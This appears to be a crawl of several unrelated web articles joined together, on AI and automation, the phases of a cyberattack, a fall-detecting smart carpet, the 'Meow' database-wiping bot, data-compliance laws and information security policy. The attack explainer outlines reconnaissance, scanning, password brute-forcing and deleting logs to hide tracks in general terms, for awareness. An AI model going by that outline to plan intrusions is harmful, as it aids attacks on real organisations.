- 5G Coverage Interactive Map | <urn:uuid:6a8a060c-554d-4662-b19a-91f2f3b7b8a9> | CC-MAIN-2022-40 | https://www.ctgmanagedit.com/a-glimpse-into-a-5g-future/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00201.warc.gz | en | 0.953429 | 606 | 2.828125 | 3 |
Just how much automation do we need today? It seems as if more and more work could be done better, if not more efficiently, by robots. Years ago, we never would have imagined the possibility of bots taking over the tedious everyday tasks we experience in the office. Yet here we are in a day and age where the Matrix is beginning to look more realistic. This begs the question, how far should we let AI take over the humanity required for the economy?
Robotics simplifies the human workload and no one can deny the impact it has on the global job market. Oxford Economics predicts that over 20 million jobs will need to be redeveloped to upkeep with the surge in AI. With society constantly improving on efficiency, is the redevelopment of jobs really an opportunity cost we can afford? Maybe, with the growing global population, it wouldn’t be so bad to keep some processes simple? After all, such practices merely improve cost efficiency in organizations, meaning the rich save more money and the poor lose out. The inequality of who benefits the most from such automation is largely skewed towards the upper class.
The lack of human conscience has been a point of debate for the development of AI. Communications between sentient beings imply a sense of intimacy between the entities. The ability to understand each other on a non-logic-based level. John R. Searle famously points out how a computer, if programmed appropriately, is a mind, (Searle, 1980, p. 417). But the issue is, do we even know the extent of how human minds are programmed? If so, how can we possibly know the complexity of how robots should be programmed?
Next must consider the security of AI. As we know, AI is non-discriminatory. Anyone can use it. But what if it falls into the wrong hands? A chief envisioning officer at Microsoft UK, Dave Coplin, indicates that priority goes to ensuring “the right people are making these algorithms.” With more organizations expanding their AI capabilities, it becomes increasingly available to the public. In the future, such a tool may even become more treacherous than firearms have been historical.
Finally, this begs the question of whether we can, ultimately, keep AI in control. Researchers at L’Ecole Polytechnique Fédérale de Lausanne point out how learning protocols have been developed that “prevent machines from learning from interruptions and thereby becoming uncontrollable.” Machines have been built to replace humans in tasks. Eventually, with AI being developed to increasingly resemble humans, who are to say it will not eventually be able to outsmart them. I feel that a sense of humility should be adhered to when dealing with the advancement of robotics, that eventually we must determine the point at which where humans have the last word.
As of today, technology has had a rampant influence on society. With the onset of COVID-19, these advancements can be felt in our everyday lives. Although it is another step forward into a futuristic society, it is paramount that we understand the purpose and capabilities that AI presents to ensure that it does not bring about more harm than good. It is also in our interest to remember the human aspects of our lives, and that some work shouldn’t be done by robots. Whether it is teaching children or understanding nature, some experiences in life just don’t require AI, but human touch.
Business Analyst – Robotic Process Automation | <urn:uuid:bbf10307-a230-47bf-9afa-f13b1a8abaf4> | CC-MAIN-2022-40 | https://www.capgemini.com/fi-en/2020/10/questioning-the-humanity-of-artificial-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00201.warc.gz | en | 0.95112 | 717 | 2.75 | 3 |
How cybercriminals plan attacks is a basic question that every cybersecurity expert needs to know. Cybercriminals use various tools and techniques to identify the vulnerabilities of their target victims. The target can either be an individual or an organization. Most cyber-attacks aim at stealing valuable information or breaching systems. Criminals plan active and passive attacks.
Active attacks actively aim to alter the targeted system. On the other hand, passive attacks only attempt to acquire as much information as possible about their target.
Active attacks may affect the integrity, authenticity, and availability of data, whereas passive attacks lead to breaches of privacy.
Cyber-attacks can also be classified as either outside attacks or inside attacks. An attack originating or executed from within the security perimeter of an organization is called an inside attack. In most cases, inside attacks are engineered and performed by employees who have access to the organization’s credentials and knowledge of the organization’s security infrastructure.
However, attacks executed from outside an organization’s or entity’s security firewall are referred to as an outside attack. This type of attack is performed by someone that does not have a direct association with the organization. The attack can be made over the internet or via a remote access connection.
In this article, I’ll walk you through many concepts so that you clearly understand how the mind of a cybercriminal works and the exact thought process of how they plan cyber-attacks. I will cover topics including types of hackers, attack techniques, types of cyber-crime, attack thought processes, how cyber criminals choose their target. I will also explain other relevant areas that will give you an in-depth understanding of a cybercriminal’s mind frame or instead thought process.
Who are cybercriminals?
Most cyber-attacks are spearheaded by individuals or small groups of hackers. However, sizeable organized crime also exploits the internet. These criminals, branded as “professional” hackers, develop new and innovative ways to commit crimes. Others form global criminal conglomerates and treat cyber-crime like an income-generating investment.
Criminal communities operate as a unit, where they share strategies and tools to launch coordinated attacks, either from the same place or from different remote locations. The “business” has advanced over the past few years with the emergence of underworld cyber-markets, where you can conveniently purchase and sell stolen credentials and other information of significance.
The internet makes it very difficult to track down cybercriminals. It allows cybercriminals to collaborate anonymously. Attacks can be launched and controlled from any location across the globe. Hackers often use computers that have already been hacked, and any form of identity is removed.
This makes it extremely difficult to identify the attacker, tool, or gadget used to execute the attack. Crime laws vary from country to country, making the situation very complicated when an attack is launched from a different country.
Types of Cyber Crime
1. Cyber-crime targeting an individual
In this type of attack, criminals exploit human weaknesses such as innocence, ignorance, and avidity. Attacks targeting an individual include copyright violation, sale of stolen or non-existent properties, financial frauds, harassment, etc. The latest technological advancements and developments of new innovative attacking tools allow cyber criminals to expand the group of potential victims.
79% of security professionals think that the biggest threat to endpoint security is the negligence among the employees for security practices. We are all human, and we all make mistakes. However, many people are scheming day and night to take advantage of a single silly mistake. This mistake can cost you tremendous financial loss.
2. Cybercrime against an organization
Cyber-attacks against an organization are also referred to as cyber terrorism. Hackers rely on computers and the internet to perform cyber terrorism, steal confidential information or destroy valuable files, take total control of the network system, or damage programs. An example is a cyber-attack on financial institutions such as banks.
3. Cybercrimes target valuable assets
This kind of crime involves stealing property such as laptops, pen drives, DVDs, mobile devices, CDs, iPad, etc. In some cases, an attacker may infect the devices with a malicious program such as malware or Trojan to disrupt the functionality. One of the Trojans used to steal information from target victims is known as a Shortcut virus. The Shortcut virus is a form of a virus that converts your valid files into a form that cannot be accessed on your PC’s hard drive or Flash drive. The shortcut does not delete the actual file but instead hides it behind the shortcut files.
4. Attacks using a single event
From the victim’s point of view, this attack is performed with a single action. For example, an individual mistakenly opens an email containing corrupted files, which may either be malware or a link that redirects you to a corrupted website. An attacker then uses the malware as a backdoor to access your system and take over the control of the entire system if need be. This type of attack can also be used to cause organization-wide havoc, and it all starts with a single click by an “ignorant” employee.
5. Cyber-attacks considering a chain of events
In some situations, hackers perform a series of events to track a victim and interact with them personally. For example, an attacker may make a phone call or chat room to establish a connection with the victim and afterward steal or explore valuable data by breaching the relationship between the two parties. Nowadays, this type of attack is prevalent. Therefore, you should be extremely cautious before accepting a friend request on Facebook or joining a WhatsApp group using links from unknown sources or WhatsApp groups.
How Cybercriminals Plan Attacks
Below are the three phases involved in planning a cyber-attack.
- Reconnaissance – this is the information gathering stage and is usually considered a passive attack.
- Scanning and scrutinization of the collected data for validation and accurate identification of existing vulnerabilities.
- Launching the attack – entails gaining and maintaining access to the system.
The first step in how cybercriminals plan attacks is always Reconnaissance. The literal meaning of reconnaissance is an act of exploring with an aim or goal of finding someone or something about the target. Concerning cybersecurity, it’s an exploration to gain information about an enemy or a potential enemy. In cybersecurity, reconnaissance begins with “Footprinting”, the initial preparation towards the preattack phase, and entails collecting data about the target’s computer infrastructure as well as their cyber-environment.
Footprinting gives an overview of the victim’s weak points and suggestions on how they can be exploited. The primary objective of this phase is to provide the attacker with an understanding of the victim’s system infrastructure, the networking ports and services, and any other aspect of security required for launching attacks.
Thus, an attacker attempts to source data from two different phases: passive and active attacks.
2. Passive attacks
This is the second phase of the attack plan. In this phase, an attacker secretly gathers information about their target; the aim is to acquire the relevant data without the victim noticing. The process can be as simple as watching an organization to see when their CEO reports to work or spying on a specific department to see when they down their tools. Because most hackers prefer executing their duties remotely, most passive attacks are conducted over the internet by googling. For example, one may use search engines such as dogpile to search for information about an individual or organization.
- Yahoo or Google search: malicious individuals can use these search engines to gather information about employees of the firm they are targeting to breach their system.
- Surfing online communities like Twitter, Facebook, Instagram can also prove useful sources to gather information about an individual, their lifestyle, and probably a hint to their weakness that can then be exploited.
- The organization’s website may also provide useful information about specific or key individuals within the organization, such as the CEO, MD, head of the IT department, etc. The website can be used to source personal details such as email addresses, phone numbers, roles, etc. With the details, an attacker can then launch a social engineering attack to breach their target.
- Press releases, blogs, newsgroups, and so on, are in some cases, used as the primary channels to gather information about an entity or employees.
- Going through job requirements for a specific position within a company can also help an attacker identify the type of technology being used by a company and the level of competency of their workforce. An attacker can then decide on what method to use when breaching the targeted system from the data.
3. Active Attacks
An active attack involves closely examining the network to discover individual hosts and verify the validity of the gathered information, such as the type of operating system in use, IP address of the given gadget, and available services on the network, collected during the passive attack. It involves the risk of detection and can also be referred to as “Active reconnaissance” or “Rattling the doorknobs”.
Active reconnaissance can be used to confirm the security measures put in place by an attacker, but at the same time, it can alert the victim if not well executed. The process may raise suspicion or increase the attacker’s chance of being caught before they execute the full attack.
4. Scrutinizing and Scanning the Gathered Information
Scanning is a key step to intelligently examine after as you collect information about the network infrastructure. The process has the following objectives;
- Network scanning is executed to understand better the IP address and other related information about the computer network system.
- Port Scanning – to identify any closed or open ports and services
- Vulnerability scanning – to identify existing weak links within the system.
In the hacking world, the scrutinizing phase is also referred to as enumeration. The objective of scrutinizing includes:
- To validate the authenticity of the user running the given account, be it an individual or a group of persons.
- To identify network resources and or shared resources
- To verify the operating system and various applications that are running on the computer OS.
The attack phase is the last step in the attack process. It involves the hacker gaining and maintaining full control of the system access. It comes immediately after scanning and enumeration, and it launched sequentially as listed in the below steps.
- Brute force attack or any other relevant method to bypass the password.
- Exploit the password.
- Launch the malicious command or applications.
- If requires, then hide the files.
- Cover the tracks, don’t leave any trail that can lead back to you as the malicious third party. This can be achieved by deleting logs so that there is no trail for your illicit actions.
The Deep Web
The deep web is the core of online underground cybercrime activities. It is inaccessible with the standard browsers and can also not be indexed by the available search engines. It entails the dark web as the most significant component. Other components include TOR, Invisible Internet Project, and Freenet.
The deep web can only be accessed by very sophisticated technologies as most owners of the site prefer to remain unknown. The contents of these websites are hidden from the general public and can only be accessed by those with A-level computing skills. The Onion Router (Tor) is used to access the Deep Web, as the browsers allow one to surf anonymously and hide your IP address with a different one.
The Deep Web is a paradise for cybercriminals. Underworld criminals can freely trade in illegal drugs, buy and sell malware, crimeware, ransomware, identity cards, deal with cyber-laundering, credit cards, and the list goes on and on.
Cybercrime is a complicated and vast phenomenon. The rapid increase in phones, Wi-Fi networks, and the internet has increased the complexity and cyber-attacks. The advancement in technology has led to an expansion in cyber-criminality and the cyber victimization of the vast ignorant population.
Protection against cybercriminal activities starts with taking individual precautionary measures. It then expands to organizational, corporate, military, societal, national, and international levels. Comprehensive protection at all levels and the installation of various layers of security minimizes, prevents, and decelerates the rate of cybercrime.
Most hackers use the commonly available tools to exploit the less knowledgeable population. Installing the right technology at your organization or personal level alone is not enough to efficiently protect against cybercrime.
Integration of fields such as awareness, employee training, culture, social aspects, laws, International corporations, and prosecutions are needed to blend with technical solutions to tackle cybercrime. Of course, it is essential to understand how cybercriminals plan attacks.
The creation of national governance and International entities formed by various countries to prosecute cybercriminals are areas to be improved. Cybersecurity is a global responsibility and should be jointly handled by major countries across the globe, if not all. Train your employees. Please give them the right technology, and always be woke to avoid the fatal damages caused by cybercriminal activities. | <urn:uuid:6d815a19-a9d4-46e9-98e8-199d4853a261> | CC-MAIN-2022-40 | https://cyberexperts.com/how-cybercriminals-plan-attacks-a-complete-guide/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00402.warc.gz | en | 0.932894 | 2,718 | 3.21875 | 3 |
A University of Missouri professor has developed a “smart carpet” that monitors the movements of elderly persons and can detect the potential for a dangerous fall. The project received funding from the Alzheimer’s Association.
The purpose of the flooring system is to help patients remain both independent and safe unobtrusively. With sensors under the carpet and electronics that monitor and communicate walking activity, “the floor sends data to a computer that crunches the data for useful information,” said the system’s inventor, Mizzou professor of electrical and computer engineering Harry Tyrer, Jr.
Such useful information includes movements consistent with stumbling or falling.
Tyrer’s research team, which includes four graduate students, is working on assessing the risk of injury associated with different types of falls and on programming the carpet system to differentiate between them. Earlier this year, they developed a working prototype, and are presently looking to shrink the prototype’s electronics down to the size of a cell phone.
With a computer system that costs US$99, Tyrer and team hope to ensure patients and their families can afford the smart carpet.
“One of the strengths of the smart carpet is computer processing,” explained Myra Aud, an associate professor at the University of Missouri Sinclair School of Nursing who has examined the carpet prototype.
“When the carpet’s sensors are triggered, a signal is sent to the computer. What happens next is only a matter of choice and programming,” she explained. “Theoretically, it could activate an alarm that awakens a caregiver, a telephone link to an offsite caregiver, or other devices.”
Impact and Inspiration
Although his smart carpet does not use transistors — yet — Tyrer told TechNewsWorld the transistor research of Annalisa Bonfiglio, an associate professor of electronics and electronic bioengineering at the University of Cagliari, Italy, inspired him.
“Annalisa is working ona ‘flexible field effect’ transistor whose current reduces under the influence of pressure,” Tyrer said. That reduction in electrical current might be utilized as a means to send a signal. “She will eventually produce a flexible film of pressure-sensitive transistors.”
The fall-sensitive flooring inspires Aud, an eldercare researcher, not only because of its ability to detect danger, but also because of its potential to impact the independence of Alzheimer’s patients, who grow increasingly dependent on caregivers as their disease progresses.
“The carpet sensors could be used to monitor the location of persons with Alzheimer’s disease,” Aud told TechNewsWorld.
Family members who care for Alzheimer’s patients at home often worry their loved one will wander away from home while they are asleep, she said. “On carpet placed near an exit door, the sensors could detect the person with Alzheimer’s approach, and send a signal to awaken caregivers.”
Strategically situated smart flooring could also reduce its cost. “It could be placed in one room, a hallway leading to an exit, a pathway where falls have occurred before, or multiple rooms,” Aud said.
Once market-ready, the smart carpet would join “a variety of products marketed to older adults and their caregivers that range from assisted-living devices for the visually-impaired or hearing-impaired to devices that summon assistance when activated,” Aud explained. “I’m sure you have seen commercials or advertisements for necklaces where the pendant has a button that, when pushed, calls a security company, for instance.”
Efforts to prepare the smart carpet for market introduction will start with residential tests, followed by addressing affordability and installation, Aud said.
“The smart carpet has only been tested in the controlled environment of Dr. Tyrer’s lab,” she noted. “For the first of these residential setting tests, we plan to place it on top of whatever floor covering is in the residence, with overlay edges securely anchored to prevent tripping.”
Hardwoods and other floor coverings could be next, and represent what Tyrer called “an interesting problem,” though “we are not sure that starting with carpet was any easier.” | <urn:uuid:f9b72a69-118b-4f98-8736-f53699743c19> | CC-MAIN-2022-40 | https://www.ecommercetimes.com/story/smart-carpet-keeps-track-of-patients-when-caregivers-cant-71521.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00402.warc.gz | en | 0.947096 | 911 | 2.984375 | 3 |
The modern world of hacking and cyber crime is one ruled by profit-seeking criminals and nation-state spies. But at one time, roughly two decades ago, it was the province of lone rogue hackers spreading viruses with no expectation of material gain. Sometimes it was a juvenile prank, some were looking to make a name for themselves, or it might have been some sort of activism. A new type of cyber attack called “Meow” is a throwback to those seemingly more innocent times. It seeks out unsecured databases and simply wipes them out without any preamble or afterword.
The hacker behind this virus does nothing to identify themselves and seems to want nothing from these attacks. It is unclear what the purpose is, but such an attack might actually be preferable to a data breach as at least the data is not being exfiltrated.
What we know about the Meow cyber attack
The new cyber attack appears to be a bot that seeks and destroys unsecured databases that run the Elasticsearch, Redis or MongoDB software. The name comes from it overwriting the word “meow” repeatedly in each database index that it finds. The bot overwrites all of the data, effectively destroying the contents of the database.
The bot appears to only target databases that do not have security access controls enabled. It was discovered by Comparitech head researcher Bob Diachenko, who characterized it as being fast and effective in seeking out new targets that have failed to secure access properly. The first database to be destroyed was that of UFO VPN, which had recently been in the news for an unrelated breach that exposed all sorts of sensitive customer information including plain text passwords and VPN session tokens. The Meow cyber attack wiped the service out after it was moved to yet another unsecured database in the wake of the original breach.
He does not know what the source of the Meow bot attack is, but has theories about the motivation. “I think that … malicious actors behind the attacks do it just for fun, because they can, and because it is really simple to do,” Diachenko told Ars Technica. Diachenko is publicly tracking the attacks on Twitter and has found over 4,000 compromised databases as of this writing, with well over half of those running Elasticsearch. He believes that copycats may have joined in the fray at this point and that attacks may be expanding to other unsecured database types such as those running Cassandra, CouchDB, Hadoop and Jenkins.
Why unsecured databases?
Some expert analysts, such as Cerberus Sentinel’s VP of Solutions Architecture Chris Clements, believe that the targeting of unsecured databases may be more than just a way to have fun with low-hanging fruit: “These types of vigilante attacks with no extortion demands or attribution are increasingly rare and therefore not likely the work of the usual cybercrime gangs whose primary goal is to extort money from their victims. It’s possible that the perpetrator is attempting to stop data disclosure from these unsecured databases, however, doing so in such a broad and indiscriminate fashion deprives potential victims from knowing if their information has been compromised so that they can take actions to prevent identity theft or be on the lookout for targeted spear phishing campaigns created using the compromised data.” Javvad Malik, Security Awareness Advocate for KnowBe4, concurs with the Meow attack “vigilante” theory: “The lack of ransom or demands, or any form of notice given by ‘meow’ suggests this could be the work of a greyhat who has had enough of unsecured databases and taken drastic measures themselves.”
Unsecured databases have been a growing cybersecurity problem for roughly two years now. This form of cyber attack saw an explosion of popularity in 2019, and some of the world’s biggest breaches that year involved Elasticsearch or MongoDB. The biggest of these was the October discovery of a mystery Elasticsearch database containing some four billion records of the personal information of about 1.2 billion people that had no password protection and was readily accessible via any web browser. Similar unprotected database breaches that contained billions of records occurred at smart device manufacturer Orvibo and SMS marketing platform TrueDialog. Similar breaches in 2019 that each contained hundreds of millions of records happened at First American Financial Corp., email validation firm Verifications.io, Capital One, and an Indian government database containing the personal information of citizens among other major incidents.
The difference with most of these breaches is that they are discovered by a security researcher and reported to the responsible parties before being made public. That is the best case scenario for a company, particularly if a forensic follow-up reveals that the researcher came across it before any potential cyber attackers did. While the deletion of a database out of nowhere is no picnic, it might actually be the next of the “least worst” means for a company to become aware of this vulnerability. At the very least, the data is not being stolen by an unknown third party. Organizations may also dodge fines under local data privacy laws if it can be shown that the data was never exposed to threat actors.
While MongoDB and Elasticsearch are hardly the only two possible targets, they are among the simplest for a cyber attacker to find and compromise as Clements observes: “Elasticsearch and MongoDB can be powerful analytic tools, however, are known to have very insecure default settings. Exposing these applications to the internet without understanding the potential risk is the cybercrime equivalent of having your cash register stolen because you left it out on the street.” Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, expanded on this observation: “Sometimes these databases are stored in the cloud because they have to interact with devices spread out amongst customers on the internet and there is no easy way to bring this data behind a corporate firewall without a proper initial design or inclusion of the IT and InfoSec teams. So, people end up with exposed databases in the cloud.”
At the very least, companies should be scrambling to identify any database exposed to the internet and putting passwords on them to avoid the wrath of the “meow bots.” | <urn:uuid:0b9c59c2-c606-4b19-ab8c-7c2b708ed098> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/new-meow-cyber-attack-that-wipes-unsecured-databases-is-a-malicious-throwback/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.954831 | 1,278 | 2.59375 | 3 |
Data compliance is the practice of following regulations set forth by corporate governance, industry organizations, and governments. These regulations set forth protocols for how sensitive data is collected, used, stored, and managed, among other requirements. Many data compliance requirements are related to data governance and data security protections.
It is important to understand that data compliance is not the same as data security. Data compliance focuses on guidelines and rules, while data security encompasses mechanisms, processes, procedures, and technologies. Data compliance and data security share a common goal of protecting sensitive data and guarding against breaches.
Let’s jump in and learn:
- General Data Protection Regulation (GDPR)
- Health Insurance Portability and Accountability Act of 1996 (HIPAA)
- Payment Card Industry Data Security Standard (PCI DSS)
- Sarbanes-Oxley Act of 2002 (SOX)
- California Consumer Privacy Act (CCPA)
- Personal Information Protection and Electronic Documents (PIPEDA)
- The Brazilian General Data Protection Act (LGPD)
- Australian Data Privacy Regulations
- The Protection of Personal Information Act (POPI)
- Federal Information Security Management Act of 2002 (FISMA)
- Family Educational Rights and Privacy Act (FERPA)
- Gramm-Leach-Bliley Act (GLBA)
- How to Ensure Data Compliance
- Data Compliance Frameworks
- Committing to Data Compliance
General Data Protection Regulation (GDPR)
The GDPR is one of the newest and most wide-ranging data compliance regulations added to the many already in place. It includes requirements for any organization that conducts business with individual subjects in the European Union (E.U.) and the European Economic Area (EEA)—regardless of its location and the data subjects’ citizenship or residence.
The GDPR focuses on people’s right to know what data businesses have on them and how companies process the data. It also specifies rules for data breach reporting.
Aside from data privacy requirements seen in other regulations, the GDPR includes specific requirements, including obtaining consent for data collection, minimizing the amount of data stored, and ensuring the rights of data subjects to access and request removal of their personal information. Systems and processes must be in place to track, protect, and manage this information to ensure data compliance.
Health Insurance Portability and Accountability Act of 1996 (HIPAA)
HIPAA drove the creation of national standards to protect sensitive patient health information from being disclosed without a patient’s consent or knowledge. Health organizations must evaluate how their data is gathered and managed and have safeguards to prevent “unnecessary or inappropriate” access to personal health information (PHI).
HIPAA specifies administrative, physical, and technical regulations that stipulate the mechanisms and procedures that have to be in place to ensure the integrity of PHI:
- Administrative regulations specify the requirements for risk assessments to clarify potential vulnerabilities related to the integrity of PHI.
- Physical regulations focus on the measures implemented to prevent unauthorized access to PHI.
- Technical regulations relate to protocols that ensure data security when PHI is being communicated on an electronic network.
Payment Card Industry Data Security Standard (PCI DSS)
The Payment Card Industry Security Council was founded by Visa, MasterCard, Discover, JCB International, and American Express to develop, maintain, and enforce a set of security standards to protect cardholder data from theft and fraud. PCI DSS regulates the storage, processing, and transmission of cardholder data to ensure its security and integrity by preventing data breaches and other forms of unauthorized access.
According to PCI DSS data compliance rules, cardholder data cannot be stored unless there is a legitimate business need. If this data is stored, records must be classified and handled with the appropriate protections. Also, data must be encrypted if it is transferred across open, public networks.
Sarbanes-Oxley Act of 2002 (SOX)
SOX requires public companies in the United States to comply with regulations that direct how records are retained. This includes timely backups of key information and document management systems with security systems to ensure data integrity.
According to SOX’s data compliance directives, the following must be monitored, logged, and audited:
- internal controls
- network activity
- database activity
- login activity
- account activity
- user activity
- information access
California Consumer Privacy Act (CCPA)
Much like the GDPR for the E.U., the CCPA applies to most organizations that conduct business in California and collect consumers’ personal data. The CCPA gives consumers more control over the personal information that businesses collect about them as well as visibility into how information about them is used and shared.
CCPA also bolsters protection for consumers’ personal data by giving them the right to take action against a company if their information was compromised in a data breach. An action for damages can be filed if the organization failed to “implement and maintain reasonable security procedures and practices” to protect consumers’ personal information.
Personal Information Protection and Electronic Documents (PIPEDA)
PIPEDA applies to all businesses operating in Canada and handling personal information that crosses provincial or national borders. This includes personal information collected, used, or disclosed in the course of a commercial activity.
Organizations must follow core principles that give individuals visibility into how their personal data is managed. PIPEDA also gives users control over their personal information, including giving consent to its use, having the ability to access and correct it, and knowing that it will be protected.
To meet PIPEDA’s data compliance requirements, companies must secure the personal information in their control to avoid loss and theft as well as unauthorized access, use, or modification. Safeguards include physical, technical, and organizational measures.
The Brazilian General Data Protection Act (LGPD)
The LGPD (Lei Geral de Proteção de Dados Pessoais) is Brazil’s version of GDPR. It consolidated over 40 regulations into one regulatory framework to govern the use of personal data in Brazil—online and offline, in the private and public sectors.
The LGPD protects Brazilian citizens and any individual whose data has been collected or processed while inside Brazil. According to the LGPD’s data compliance requirements, any organization that collects or processes personal information is required to adopt technical and administrative measures to protect this data from data breaches or leaks that could result in unauthorized access, loss, or modification.
In addition, organizations must document the processing of personal data throughout its lifecycle. This includes a description of what is collected, the purpose of collection and processing, retention time, and how data is shared.
Australian Data Privacy Regulations
The Privacy Act 1988 (Privacy Act) is Australia’s primary law that addresses data compliance as related to the handling of personal information about individuals. This includes collecting, using, storing, and disclosing personal information by public and private organizations.
The Australian Privacy Principles (APPs) in the Privacy Act provide data compliance direction related to the collection, use, and disclosure of personal information. Under the Privacy Act, organizations are responsible for the data governance, accountability, and integrity of personal information.
The Protection of Personal Information Act (POPI)
South Africa’s POPI directs how businesses must organize, store, secure, and discard personal information. POPI also changes the default consent from opt-in to opt-out. While companies do not need to get permission to collect information, they are not allowed to share collected information with anyone else or send marketing material without consent.
POPI includes data compliance requirements related to the processing of personal information, data quality, and data protection. POPI also has significant penalties for data breaches.
Federal Information Security Management Act of 2002 (FISMA)
FISMA protects government information, assets, and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction. It applies to all agencies within the U.S. federal government as well as state agencies administering federal programs, such as unemployment insurance, student loans, Medicare, and Medicaid.
The National Institute of Standards and Technology (NIST) provides specific guidance for complying with FISMA, including:
- implementing a risk management program
- protecting data and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction
- ensuring the integrity, confidentiality, and availability of sensitive information
Data compliance requirements include maintaining an inventory of information systems, categorizing information and information systems according to risk level, and conducting continuous monitoring.
Family Educational Rights and Privacy Act (FERPA)
FERPA is a U.S. federal law that protects the privacy of student education records, including report cards, transcripts, disciplinary records, contact and family information, and class schedules. Data compliance rules prohibit unauthorized access or disclosure of personally identifiable information derived from education records.
FERPA’s data compliance requirements apply to any public or private elementary, secondary, post-secondary school, and any state or local education agency that receives funds under an applicable program of the U.S. Department of Education.
Gramm-Leach-Bliley Act (GLBA)
GLBA requires financial institutions to maintain the security and confidentiality of customer data and protect against any threats to the data. Data compliance requirements under GLBA cover nonpublic personal information, including Social Security numbers, credit and income histories, credit and bank card account numbers, phone numbers, addresses, names, and any other personal customer information received by a financial institution that is not public.
GLBA data compliance requires that private information be secured against unauthorized access. Customers must be notified of private information sharing between financial institutions and third parties. Customers can opt out of private information sharing, and user activity must be tracked, including any attempts to access protected records.
How to Ensure Data Compliance
Taking care to follow key data security and compliance strategies goes a long way to ensuring data compliance. Consider these four foundational data compliance guidelines at the core of these strategies:
- Continuously check for changes in laws and regulations related to data compliance. Software solutions are available to provide notifications about updates, but someone needs to be responsible for ensuring that any necessary changes are made.
- Identify and leverage third-party expertise. Find the best technology and people to support data compliance programs.
- Create processes and policies that ensure that employees support data compliance programs. Following data compliance best practices that integrate with employees’ workflows helps to make data compliance programs successful.
- Do not wait for external audits to assess data compliance. Regular internal audits are the best way to identify and remediate data compliance gaps.
Data Compliance Frameworks
A data compliance framework is a set of guidelines and best practices that helps organizations adhere to regulatory requirements. These are designed around specific laws and regulations, such as PCI DSS, HIPAA, and GDPR.
A data compliance framework provides direction on technical requirements, such as:
- Access control
- Incident response
- Perimeter defense
- Risk management
It also offers guidance for how data compliance should be managed across the organization to meet requirements.
Committing to Data Compliance
Data compliance requires a concerted commitment backed up with robust programs. Take the time to identify the right resources—people and technology—to meet data compliance requirements. In addition to avoiding penalties for violations, data compliance provides greater visibility and access to data to power analytics that deliver valuable insights.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers with millions of customers worldwide. | <urn:uuid:f0e3f172-6a61-484c-a9d0-012d6abe013e> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/governance/data-compliance | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.908545 | 2,407 | 3.09375 | 3 |
11 Key Elements of an Information Security Policy
An information security policy is a set of rules and guidelines that dictate how information technology (IT) assets and resources should be used, managed, and protected. It applies to all users in an organization or its networks as well as all digitally stored information under its authority. An information security policy addresses threats and defines strategies and procedures for mitigating IT security risks.
There are many components of an information security policy. Fundamental elements include:
- Information security roles and responsibilities
- Minimum security controls
- Repercussions for breaking information security policy rules
An information security policy is an aggregate of directives, regulations, rules, and practices that prescribes how an organization manages, protects, and distributes information.The National Institute of Science and Technology (NIST)
What is an Information Security Policy?
Since organizations have different structures and requirements, IT departments should create an information security policy that is optimal for operational teams and users. The policy should also provide the guidance required to comply with regulatory requirements—corporate, industry, and government.
An information security policy should clearly define the organization’s overall cybersecurity program’s objectives, scope, and goals. This creates a solid foundation for the policy and provides context to the specific rules that employees must follow.
While there are common elements across information security policies, each policy should reflect consideration of the unique operational aspects and specific threats related to an industry, region, or organizational model that can put IT resources and data at risk. For example:
- Healthcare-related organizations must meet strict Protected Health Information (PHI) data protection standards set forth by HIPAA.
- Manufacturing companies have to protect and monitor remote internet of things (IoT) devices.
- Life sciences organizations must meet strict requirements related to electronic documents and signatures (Title 21 CFR Part 11).
- Local regulations
- Adverse weather conditions—e.g., hurricanes, tornadoes
- Physical threats related to conflict
- Organizational model:
- Remote offices
- Field staff
- Contract workforce
An information security policy should be a living document, reviewed and updated regularly to consider new or changing threats, processes, and regulations. This has several benefits:
- Demonstrates that the organization considers information security a high priority
- Keeps security protocols up to date and ready to effectively address threats and meet compliance requirements
- Provides accurate direction for issue resolution, disaster recovery, and overall security management
- Reduces the risk of reduced productivity, financial loss, and damage to reputation in the event of a security incident
The Importance of an Information Security Policy
An information security policy helps everyone in the organization understand the value of the security measures that IT institutes, as well as the direction needed to adhere to the rules. It also articulates the strategies in place and steps to be taken to reduce vulnerability, monitor for incidents, and address security threats.
An information security policy provides clear direction on procedure in the event of a security breach or disaster.
Important outcomes of an information security policy include:
Facilitates the confidentiality, integrity, and availability of data
A robust policy standardizes processes and rules to help organizations protect against threats to data confidentiality, integrity, and availability.
Reduces the risk of security incidents
An information security policy outlines procedures for identifying, assessing, and mitigating security vulnerabilities and risks. It also explains how to quickly respond to minimize damage in the event of a security incident.
Executes security programs across an organization
To ensure successful execution, a security program needs an information security policy to provide the framework for operationalizing procedures
Provides clear statement of security policy to third parties
The policy summarizes the organization’s security posture and details how it protects IT assets and resources. It allows organizations to quickly respond to third-party (e.g., customers’, partners’, auditors’) requests for this information.
Helps to address regulatory compliance requirements
The process of developing an information security policy helps organizations identify gaps in security protocols relative to regulatory requirements.
11 Elements of an Information Security Policy
An information security policy should be comprehensive enough to address all security considerations. It must also be accessible; everyone in the organization must be able to understand it.
Boilerplate information security policies are not recommended, as they inevitably have gaps related to the unique aspects of your organization. The information security framework should be created by IT and approved by top-level management.
A robust information security policy includes the following key elements:
- 1. Purpose
- 2. Scope
- 3. Timeline
- 4. Authority
- 5. Information security objectives
- 6. Compliance requirements
- 7. Body—to detail security procedures, processes, and controls in the following areas:
- Acceptable usage policy
- Antivirus management
- Backup and disaster recovery
- Change management
